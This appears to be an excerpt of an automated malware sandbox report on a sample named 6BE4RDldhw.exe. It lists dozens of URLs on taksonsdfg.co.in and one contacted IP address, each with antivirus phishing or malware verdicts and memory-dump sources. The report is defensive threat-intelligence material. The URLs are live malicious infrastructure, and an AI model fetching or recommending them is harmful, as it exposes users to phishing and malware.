https://taksonsdfg.co.in/234567876543212a	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi43/243_Yjnxmyasmza-bRk	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi43/243_Yjnxmyasmzakb	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in/	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in/4	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi4	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgiP	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in/iu	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgiU3	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in/234567876543212	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi$	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi43/243_YjnxmyasmzaWb	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in/2345678765432123456789876543/243_Yjnxmyasmza$	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in/2345678765432123456789876543/243_Yjnxmyasmza#	100%	Avira URL Cloud	malware
https://www.veeble.org/contact/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
taksonsdfg.co.in	108.170.55.202	true	true	12%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi	true	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in/2345678765432123456789876543/243_Yjnxmyasmza	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgi8	6BE4RDldhw.exe, 00000000.00000003.1914742318.00000000008CC000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in/05	6BE4RDldhw.exe, 00000000.00000003.1394882795.00000000008D4000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgi:	6BE4RDldhw.exe, 00000000.00000003.1648113930.00000000008CE000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgi	6BE4RDldhw.exe, 00000000.00000003.2047547102.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2434006872.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2475345569.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2388478976.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2004240497.00000000008CB000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2303973460.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000002.2580778228.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2176461994.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2521127885.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1738626305.00000000008CB000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2089947021.000000000091C000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2345346508.0000000000917000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi43/243_YjnxmyasmzaIb	6BE4RDldhw.exe, 00000000.00000003.1914742318.0000000000909000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1870938682.0000000000909000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1917472858.000000000090B000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgiDASYC	6BE4RDldhw.exe, 00000000.00000003.2434006872.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2475345569.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2388478976.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2303973460.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000002.2580778228.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2521127885.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2345346508.0000000000917000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi43/243_Yjnxmyasmza	6BE4RDldhw.exe, 00000000.00000003.1827581814.0000000000909000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2521127885.000000000090B000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1961444779.000000000090B000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2434006872.000000000090B000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2303973460.000000000090B000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2089947021.000000000090B000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2004240497.000000000090B000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2129633802.0000000000909000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2047547102.000000000090B000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2345346508.000000000090B000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000002.2580778228.000000000089E000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1738626305.0000000000909000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1519974580.000000000090C000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1435332784.000000000090C000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2176461994.000000000090B000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in:443/2345678765432123456789876543/243_YjnxmyasmzaX	6BE4RDldhw.exe, 00000000.00000003.2475345569.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000002.2580778228.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2521127885.0000000000917000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgiqr	6BE4RDldhw.exe, 00000000.00000003.2129633802.0000000000903000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in/9r6k	6BE4RDldhw.exe, 00000000.00000003.1961444779.0000000000905000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2303973460.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1827581814.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1690257877.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2089947021.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1738626305.0000000000904000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2047547102.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1870938682.0000000000903000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgiLocationETagAuthentication-InfoAgeAccept-RangesLas	6BE4RDldhw.exe, 00000000.00000003.2089947021.0000000000901000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2176461994.0000000000901000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1435332784.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2047547102.0000000000901000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000002.2580778228.00000000008FC000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2129633802.0000000000901000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1519974580.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2434006872.0000000000901000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2475345569.0000000000901000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2345346508.0000000000901000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2521127885.0000000000901000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1914742318.0000000000924000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2004240497.00000000008CB000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2303973460.0000000000901000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2388478976.0000000000901000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1648113930.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1961444779.00000000008CC000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in/H	6BE4RDldhw.exe, 00000000.00000003.2345346508.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2388478976.0000000000903000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in/234567876543212P	6BE4RDldhw.exe, 00000000.00000002.2597281272.000000001FABF000.00000004.00001000.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in/2345678765432121$	6BE4RDldhw.exe, 00000000.00000002.2597281272.000000001FA8F000.00000004.00001000.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in:443/2345678765432123456789876543/243_Yjnxmyasmza0u	6BE4RDldhw.exe, 00000000.00000003.2434006872.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2475345569.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2388478976.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2303973460.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2345346508.0000000000917000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in/2345678765432123456789876543/243_Yjnxmyasmzaaq	6BE4RDldhw.exe, 00000000.00000003.2176461994.00000000008AB000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in/yr	6BE4RDldhw.exe, 00000000.00000003.1961444779.0000000000905000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2345346508.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1914742318.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1827581814.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2004240497.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2089947021.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1738626305.0000000000904000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1870938682.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1917472858.0000000000905000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgi43/243_Yjnxmyasmza0u	6BE4RDldhw.exe, 00000000.00000002.2580778228.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2521127885.0000000000917000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in/1r	6BE4RDldhw.exe, 00000000.00000003.2089947021.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2521127885.0000000000903000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in/2345678765432123456789876543/243_Yjnxmyasmzakb	6BE4RDldhw.exe, 00000000.00000003.1961444779.000000000090B000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in:443/2345678765432123456789876543/243_Yjnxmyasmza	6BE4RDldhw.exe, 00000000.00000003.2345346508.0000000000917000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi43/243_Yjnxmyasmzaqb	6BE4RDldhw.exe, 00000000.00000003.1690257877.000000000090B000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1914742318.0000000000909000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1917472858.000000000090B000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in/)r	6BE4RDldhw.exe, 00000000.00000003.2176461994.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2475345569.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2521127885.0000000000903000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgim	6BE4RDldhw.exe, 00000000.00000003.1870938682.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1827581814.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1914742318.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2176461994.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2129633802.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2004240497.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1961444779.0000000000917000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in/2345678765432123456789876543/243_Yjnxmyasmzak	6BE4RDldhw.exe, 00000000.00000003.2176461994.00000000008AB000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000002.2580778228.000000000089E000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgig3ok	6BE4RDldhw.exe, 00000000.00000002.2580778228.000000000089E000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgi$	6BE4RDldhw.exe, 00000000.00000003.2129633802.0000000000917000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in/Qu	6BE4RDldhw.exe, 00000000.00000003.1648113930.0000000000901000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1435332784.0000000000903000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in/cgi-s	6BE4RDldhw.exe, 00000000.00000003.2345346508.00000000008DD000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in/Qr	6BE4RDldhw.exe, 00000000.00000003.1914742318.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1827581814.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2388478976.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2521127885.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1917472858.0000000000905000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgi1Content-LengthAllowWarningViaUpgradeTransfer-	6BE4RDldhw.exe, 00000000.00000003.1519974580.00000000008CD000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in/Ir	6BE4RDldhw.exe, 00000000.00000003.2345346508.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1648113930.0000000000901000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1914742318.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1827581814.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2388478976.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1690257877.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2176461994.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1738626305.0000000000904000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1870938682.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2129633802.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2521127885.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1917472858.0000000000905000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgi43/243_Yjnxmyasmza	6BE4RDldhw.exe, 00000000.00000002.2580778228.0000000000917000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgiLocationETagAuthentication-InfoAgeAccept-R	6BE4RDldhw.exe, 00000000.00000003.1870938682.0000000000909000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in/Ar	6BE4RDldhw.exe, 00000000.00000003.2303973460.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1914742318.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1870938682.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1917472858.0000000000905000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi)r	6BE4RDldhw.exe, 00000000.00000003.1961444779.0000000000905000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2303973460.0000000000903000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi43/243_YjnxmyasmzaCb	6BE4RDldhw.exe, 00000000.00000003.1648113930.0000000000901000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in/2345678765432123456789876543/243_Yjnxmyasmza8	6BE4RDldhw.exe, 00000000.00000003.1648113930.00000000008D7000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in/2345678765432123456789876543/243_Yjnxmyasmza7	6BE4RDldhw.exe, 00000000.00000003.2176461994.00000000008AB000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in/234567876543212a	6BE4RDldhw.exe, 00000000.00000002.2597281272.000000001FA8F000.00000004.00001000.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi43/243_Yjnxmyasmza-bRk	6BE4RDldhw.exe, 00000000.00000003.1827581814.0000000000909000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1648113930.0000000000901000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2521127885.000000000090B000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1961444779.000000000090B000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2434006872.000000000090B000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000002.2580778228.0000000000909000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2303973460.000000000090B000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2089947021.000000000090B000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2004240497.000000000090B000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1690257877.000000000090B000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1914742318.0000000000909000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1870938682.0000000000909000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2129633802.0000000000909000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2475345569.000000000090B000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2047547102.000000000090B000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1917472858.000000000090B000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2345346508.000000000090B000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1738626305.0000000000909000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2388478976.000000000090B000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2176461994.000000000090B000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi43/243_Yjnxmyasmzakb	6BE4RDldhw.exe, 00000000.00000002.2580778228.0000000000909000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2388478976.000000000090B000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in/	6BE4RDldhw.exe, 00000000.00000003.1738626305.0000000000904000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2434006872.0000000000906000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2047547102.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2475345569.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1870938682.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2129633802.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2433890987.0000000000939000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2521127885.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1519974580.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1917472858.0000000000905000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in/4	6BE4RDldhw.exe, 00000000.00000003.1961444779.0000000000905000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1914742318.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1870938682.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1917472858.0000000000905000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi4	6BE4RDldhw.exe, 00000000.00000003.1914742318.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1917472858.0000000000905000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgiP	6BE4RDldhw.exe, 00000000.00000003.2434006872.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2475345569.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000002.2580778228.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2521127885.0000000000917000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in/iu	6BE4RDldhw.exe, 00000000.00000003.1394882795.00000000008D4000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1519974580.0000000000903000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgiU3	6BE4RDldhw.exe, 00000000.00000002.2580778228.000000000089E000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in/234567876543212	6BE4RDldhw.exe, 00000000.00000002.2597281272.000000001FABF000.00000004.00001000.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000002.2597281272.000000001FACD000.00000004.00001000.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000002.2597281272.000000001FA8F000.00000004.00001000.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in/ar	6BE4RDldhw.exe, 00000000.00000003.2303973460.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1914742318.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1690257877.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2089947021.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2434006872.0000000000906000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2475345569.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2521127885.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1917472858.0000000000905000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi$	6BE4RDldhw.exe, 00000000.00000003.2176461994.0000000000917000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
